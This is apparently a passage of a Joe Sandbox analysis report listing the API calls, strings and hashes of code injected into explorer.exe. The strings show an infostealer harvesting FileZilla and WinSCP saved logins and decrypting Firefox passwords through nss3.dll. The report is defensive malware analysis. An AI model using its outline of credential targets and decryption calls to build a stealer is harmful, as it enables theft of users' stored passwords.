                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 032712B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryZero
                                                                        • String ID:
                                                                        • API String ID: 816449071-0
                                                                        • Opcode ID: f81b90fdcace0c9ffadd1b35ccb4bbe5686508042d77122d1000604c783c8b62
                                                                        • Instruction ID: 0bf87586162aa5538aa3651236daffd90017ac464a0e5afc7f8e1facb804f733
                                                                        • Opcode Fuzzy Hash: f81b90fdcace0c9ffadd1b35ccb4bbe5686508042d77122d1000604c783c8b62
                                                                        • Instruction Fuzzy Hash: E6110AB1A11209AFDB10EFA5E988ABEB7BCFF08641B144029F945E3240D770DA44CB60
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,03272C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 03271BAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 278a69b8b08c0b13b906bc614435da82d2509883fe5677a734bfdf94904b38ec
                                                                        • Instruction ID: 7f5cf9317dfcb2a75427b07664c49f065f6e23bd21851fac4a1ff04fa6313c36
                                                                        • Opcode Fuzzy Hash: 278a69b8b08c0b13b906bc614435da82d2509883fe5677a734bfdf94904b38ec
                                                                        • Instruction Fuzzy Hash: A3D0A933E23432828A74AA38380C8A2E2807E8057431E03B4FC26F34C4E234ECE342C0
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 03271684
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateGlobalStream
                                                                        • String ID:
                                                                        • API String ID: 2244384528-0
                                                                        • Opcode ID: c375d3b49bf918237ad69a5ebbe4f11bc1110763d862aef70968700663ff2165
                                                                        • Instruction ID: 43cfd37ab0ba4d9394f8cf64ccb33531d6912bc788ee5607d52a1febc48b4ac9
                                                                        • Opcode Fuzzy Hash: c375d3b49bf918237ad69a5ebbe4f11bc1110763d862aef70968700663ff2165
                                                                        • Instruction Fuzzy Hash: 4AC08C31130232DFE7302A309C0AB8636D8EF09BB2F0A0969E0C19D0C0E2F848C0CA91
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0327158A), ref: 03271056
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 78cf39cee7a927a49b00abc06f82b703b7552ee1cb7f7ad0b4b98f1beeb957f1
                                                                        • Instruction ID: efc7df3bf6ff48d1ce52bb8983561edacefb7cd83123f7a037e23bc5c900dbe5
                                                                        • Opcode Fuzzy Hash: 78cf39cee7a927a49b00abc06f82b703b7552ee1cb7f7ad0b4b98f1beeb957f1
                                                                        • Instruction Fuzzy Hash: FFA002F07E57007AFD696762BE1FF152938AB40F02F144244B30D7C0C456E47500852D
                                                                        APIs
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,03274A5B,?,?,00000000,?,?,?,?,03274B66,?), ref: 03271065
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: ba4c09fdc16772d866da8f97fdf609cede259a87ea2540edf869abf1bdb46970
                                                                        • Instruction ID: a8ecf31187cf5d29a0bc4dabe51ca7399f6794964c3e5c7ae7099c2d517ffbc6
                                                                        • Opcode Fuzzy Hash: ba4c09fdc16772d866da8f97fdf609cede259a87ea2540edf869abf1bdb46970
                                                                        • Instruction Fuzzy Hash: 18A002706A070066EDB467206D0EF1526146740F02F2485447281A95C549E5E0448A18
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 032734C0
                                                                          • Part of subcall function 032733C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 03273401
                                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,032737A8), ref: 032734E9
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0327351E
                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 03273541
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 03273586
                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0327358F
                                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 032735B6
                                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 032735DE
                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 032735F6
                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 03273606
                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0327361E
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 03273631
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 03273658
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0327366B
                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 03273681
                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 032736AD
                                                                        • CloseHandle.KERNEL32(?), ref: 032736C0
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,032737A8), ref: 032736F5
                                                                          • Part of subcall function 03271C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03271CC0
                                                                          • Part of subcall function 03271C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03271CDA
                                                                          • Part of subcall function 03271C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03271CE6
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,032737A8), ref: 03273707
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                        • String ID: File
                                                                        • API String ID: 3915112439-749574446
                                                                        • Opcode ID: 86d6615e1eb20a87852620128a46e3379c663da3c967ac8a0364c56f1b200673
                                                                        • Instruction ID: aff085d8b72e9192dffa2d240bb8561b47222161fea0acdef46a9c6bd1cdcd32
                                                                        • Opcode Fuzzy Hash: 86d6615e1eb20a87852620128a46e3379c663da3c967ac8a0364c56f1b200673
                                                                        • Instruction Fuzzy Hash: B061B475224301AFD720EF21DC48F2BBBE9FF88751F18052CFA8696290D775D8849B95
                                                                        APIs
                                                                        • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 032C4502
                                                                        • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 032C475F
                                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 032C4803
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp$memcpy
                                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                        • API String ID: 231171946-1096842476
                                                                        • Opcode ID: 5e5fbcbb945ea50f790540c81bc3d58fde5bde4b4c1a5bc8dec47d91deacb8dc
                                                                        • Instruction ID: 113befc179b1478875270d2f65189307927c70243dc60b27fec812e5411619d0
                                                                        • Opcode Fuzzy Hash: 5e5fbcbb945ea50f790540c81bc3d58fde5bde4b4c1a5bc8dec47d91deacb8dc
                                                                        • Instruction Fuzzy Hash: BDC14570A383C38BDB36EE1A846077BB7E5AF85214F18075EE8D587246C774D4C98B42
                                                                        APIs
                                                                          • Part of subcall function 03276AAA: memset.NTDLL ref: 03276AC5
                                                                        • memset.NTDLL ref: 03295F53
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                        • API String ID: 2221118986-594550510
                                                                        • Opcode ID: 73204687cc2c7e8e66a49aad4a7d13bb927b0498fe8bd5c9aab1c34e1cac019d
                                                                        • Instruction ID: bde89ac149a6ee279f0b06fc38fe6dd5cd4aa5d65e8893aa70e25efad6f04b50
                                                                        • Opcode Fuzzy Hash: 73204687cc2c7e8e66a49aad4a7d13bb927b0498fe8bd5c9aab1c34e1cac019d
                                                                        • Instruction Fuzzy Hash: 07C1A174A247429FDB14DF24C480A2EF7E2BF88710F14892EF8549B241D775D996CB92
                                                                        APIs
                                                                        • CoCreateInstance.COMBASE(032C62B0,00000000,00000001,032C62A0,?), ref: 0327445F
                                                                        • SysAllocString.OLEAUT32(?), ref: 032744AA
                                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0327456E
                                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 0327457D
                                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 0327458C
                                                                          • Part of subcall function 032711E1: lstrlenW.KERNEL32(?,7591F360,00000000,?,00000000,?,032746E3), ref: 032711ED
                                                                          • Part of subcall function 032711E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0327120F
                                                                          • Part of subcall function 032711E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 03271231
                                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 032745BE
                                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 032745CD
                                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 03274657
                                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 03274679
                                                                        • lstrcmpiW.KERNEL32(User,?), ref: 0327469F
                                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 032746C5
                                                                        • wsprintfW.USER32 ref: 0327471E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                        • API String ID: 2230072276-1234691226
                                                                        • Opcode ID: af43655965a6aef20e955db43326b716376903ecbb70edeed9a6822de3b27d86
                                                                        • Instruction ID: 93b80fb5acc9948faa4f86ab546d7b51d3a690a7160ef62cae59279736b70da6
                                                                        • Opcode Fuzzy Hash: af43655965a6aef20e955db43326b716376903ecbb70edeed9a6822de3b27d86
                                                                        • Instruction Fuzzy Hash: FCB16771214302AFD700EF65C884E6AB7E9FFC9744F14895CF5998B260DB71E84ACB62
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                          • Part of subcall function 03271090: lstrlenW.KERNEL32(?,?,00000000,032717E5), ref: 03271097
                                                                          • Part of subcall function 03271090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 032710A8
                                                                          • Part of subcall function 032719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03272CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 032719C4
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 03272503
                                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0327250A
                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 03272563
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 03272570
                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 03272591
                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0327259E
                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 032725AB
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 032725B8
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 032725C5
                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 032725D2
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 032725DF
                                                                          • Part of subcall function 0327190B: lstrlen.KERNEL32(?,?,?,?,00000000,03272783), ref: 0327192B
                                                                          • Part of subcall function 0327190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,03272783), ref: 03271930
                                                                          • Part of subcall function 0327190B: lstrcat.KERNEL32(00000000,?), ref: 03271946
                                                                          • Part of subcall function 0327190B: lstrcat.KERNEL32(00000000,00000000), ref: 0327194A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                        • API String ID: 3366569387-3272982511
                                                                        • Opcode ID: 56772df1c0f4211b2e9cdc6ec4671725150bf7e94ffcf6831f58150b753dff28
                                                                        • Instruction ID: 5153622469711ad304b454f19f72a18f74b795578e285b5359ea3aa8cdbd8146
                                                                        • Opcode Fuzzy Hash: 56772df1c0f4211b2e9cdc6ec4671725150bf7e94ffcf6831f58150b753dff28
                                                                        • Instruction Fuzzy Hash: 5B415935E31352CFCB64FF35A85852E7AE9FF84640708482FD8419B60ADFB4A8A5CB51
                                                                        APIs
                                                                          • Part of subcall function 03275BF5: memset.NTDLL ref: 03275C07
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 032760E1
                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 032760EC
                                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 03276113
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0327618E
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 032761B5
                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 032761C1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldiv$_allrem$memset
                                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                        • API String ID: 2557048445-1989508764
                                                                        • Opcode ID: 6400ac730fe6bb183fe70d44702ac1c99d122b9a61ac8140e0ab87452f2cad20
                                                                        • Instruction ID: 31727e1be742aa9cdb47cea0819ff7b700d77b78f50ea7ce12432f865659d374
                                                                        • Opcode Fuzzy Hash: 6400ac730fe6bb183fe70d44702ac1c99d122b9a61ac8140e0ab87452f2cad20
                                                                        • Instruction Fuzzy Hash: 68B15DB1938783AFD721DE28CC84B3AFBD4FB42244F2C0649F482A6191E7B5D9D086D5
                                                                        APIs
                                                                        • memcmp.NTDLL(032C637A,BINARY,00000007), ref: 0328D324
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp
                                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                        • API String ID: 1475443563-3683840195
                                                                        • Opcode ID: b86c070a67a108adec61f16a2ccd1c46ae9f43603fba93a93af5571fb6947f2a
                                                                        • Instruction ID: d052a54a36f909248436d5102ec8eae753161d64c540150b83161bfcc26fadf7
                                                                        • Opcode Fuzzy Hash: b86c070a67a108adec61f16a2ccd1c46ae9f43603fba93a93af5571fb6947f2a
                                                                        • Instruction Fuzzy Hash: 0151D231535340AFC720EF68CC41A7AB3A5BB45600F09496DF9A19B2D2D3F0E8C9CB91
                                                                        APIs
                                                                          • Part of subcall function 032719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A1E
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A3C
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A75
                                                                          • Part of subcall function 032719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A98
                                                                          • Part of subcall function 0327482C: lstrlenW.KERNEL32(?), ref: 03274845
                                                                          • Part of subcall function 0327482C: lstrlenW.KERNEL32(?), ref: 0327488F
                                                                          • Part of subcall function 0327482C: lstrlenW.KERNEL32(?), ref: 03274897
                                                                        • wsprintfW.USER32 ref: 032749A7
                                                                        • wsprintfW.USER32 ref: 032749B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                        • API String ID: 2889301010-4273187114
                                                                        • Opcode ID: b326bcfe71268696b20f517bd52a507827e0108b06ac85175036c302b7017159
                                                                        • Instruction ID: 34a19daeab04aaf22b27d30303f7a52e0ba6d71e96400c49419a9c882955674f
                                                                        • Opcode Fuzzy Hash: b326bcfe71268696b20f517bd52a507827e0108b06ac85175036c302b7017159
                                                                        • Instruction Fuzzy Hash: AF31F426728355ABC710FB66CC4582FB6EEFFCA644B094A1DB44587240DBF2DCC187A1
                                                                        APIs
                                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 0327FB32
                                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0327FB4D
                                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0327FB60
                                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0327FB95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                        • API String ID: 3510742995-3408036318
                                                                        • Opcode ID: 59758a06381dc12ef1a07fbeda1d810a4a97e3aa1c4f3a1a8c4e97f8c25fb888
                                                                        • Instruction ID: 5fa76e5a0883ef0c0e975cfee12c7e065d212f4983a586e0567c45c04341bbe8
                                                                        • Opcode Fuzzy Hash: 59758a06381dc12ef1a07fbeda1d810a4a97e3aa1c4f3a1a8c4e97f8c25fb888
                                                                        • Instruction Fuzzy Hash: 34D1E6B16283429FD714DF28C880B2ABBE5BF85314F08456DEC998F391D7B5D884CB62
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$-x0$NaN
                                                                        • API String ID: 0-62881354
                                                                        • Opcode ID: b1202de026ca804524fc15f3900d183cc6f08055882f08ef1e718138a746994f
                                                                        • Instruction ID: ddbee00bde8d18413674d4f62a34de04efa2b4a32daf7aa6a3e89378f794c51f
                                                                        • Opcode Fuzzy Hash: b1202de026ca804524fc15f3900d183cc6f08055882f08ef1e718138a746994f
                                                                        • Instruction Fuzzy Hash: 78D1E1306387928BD725CA2C849473AFBE5BF8A604F18499DF8C297251D6B4C9C5C792
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: 5f7a6c1fce62a4968dfe7f4b19c11dbbad8d188254c9f717c27f8cc4ce95d550
                                                                        • Instruction ID: 065fcdfd15b936628cc0ec0a237a423dcb6b235dd1f383d44526dd29d92f0d58
                                                                        • Opcode Fuzzy Hash: 5f7a6c1fce62a4968dfe7f4b19c11dbbad8d188254c9f717c27f8cc4ce95d550
                                                                        • Instruction Fuzzy Hash: 86E1D230A387838BD725CA2C849473AFBE5BF8A604F18499DE8C297351D6B5C9C5C792
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: 8a709f2a89a5930f5ad167561af7faec53476829ebb5fb5ec6be0403e27f91d5
                                                                        • Instruction ID: 9d208bb1cdd0d9d022c339704e532be3dfee8e4a74af668b69152108e90f4110
                                                                        • Opcode Fuzzy Hash: 8a709f2a89a5930f5ad167561af7faec53476829ebb5fb5ec6be0403e27f91d5
                                                                        • Instruction Fuzzy Hash: 45E1F2346387828BD725CE2C849473AFBE5BF8A604F18499DE8C29B351D6B1C9C5C792
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: 495f9ff68ecf24e9cc573ed70f354874fb460ad25c4230889521ed4d6a0d5f82
                                                                        • Instruction ID: 58153feeb46dd5555efffff6a3c23f872b87a5a375754d5db1576299442ab964
                                                                        • Opcode Fuzzy Hash: 495f9ff68ecf24e9cc573ed70f354874fb460ad25c4230889521ed4d6a0d5f82
                                                                        • Instruction Fuzzy Hash: 90E1E2346387838BD725CE2C849473AFBE5BF8A604F18499DE8C287251D6B4C9C5C792
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: a8202176460708c3a171561d06799318153d433a9424df398ca106e3383ac139
                                                                        • Instruction ID: 7f0b99f686d5bcb4d62288b8c6c681ff63a63b1c663ce35b6d096fe9536295d4
                                                                        • Opcode Fuzzy Hash: a8202176460708c3a171561d06799318153d433a9424df398ca106e3383ac139
                                                                        • Instruction Fuzzy Hash: 21E1DF306387828FD725CA2C849473AFBE5BF8A604F18499DE8C297351D6B4C9C5CB92
                                                                        APIs
                                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0327720E
                                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 03277226
                                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0327727B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _aulldvrm$_aullrem
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 105165338-3447725786
                                                                        • Opcode ID: ec636fdc1592cf449ba1e8a439c40f66fe4cba66ad74e105c2004feabc243991
                                                                        • Instruction ID: 922d64c40d9aeaa0bf385c1c9c7f9880c949b76b2cdd7642bf04415426b5f72e
                                                                        • Opcode Fuzzy Hash: ec636fdc1592cf449ba1e8a439c40f66fe4cba66ad74e105c2004feabc243991
                                                                        • Instruction Fuzzy Hash: 31D1D0306387838BD725CA2C849473AFBE5BF8A604F18499DF8C297251D6B4C9C5C792
                                                                        APIs
                                                                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 03278AAD
                                                                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 03278B66
                                                                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 03278C9B
                                                                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 03278CAE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul$_alldvrm
                                                                        • String ID: .
                                                                        • API String ID: 115548886-248832578
                                                                        • Opcode ID: 7528773562056b105ca584f1ccdd7ca037c408fb26c80ab5d16d09927bcae108
                                                                        • Instruction ID: 7792c1de001adc73ca9bc3a4c91b9cd5817499da5c6351e4ff24a334c69affa7
                                                                        • Opcode Fuzzy Hash: 7528773562056b105ca584f1ccdd7ca037c408fb26c80ab5d16d09927bcae108
                                                                        • Instruction Fuzzy Hash: 33D108B292C7858BC714DF19848922EFBF9FBC5710F084D9EF5D596280E3B1C9858786
                                                                        APIs
                                                                        Strings
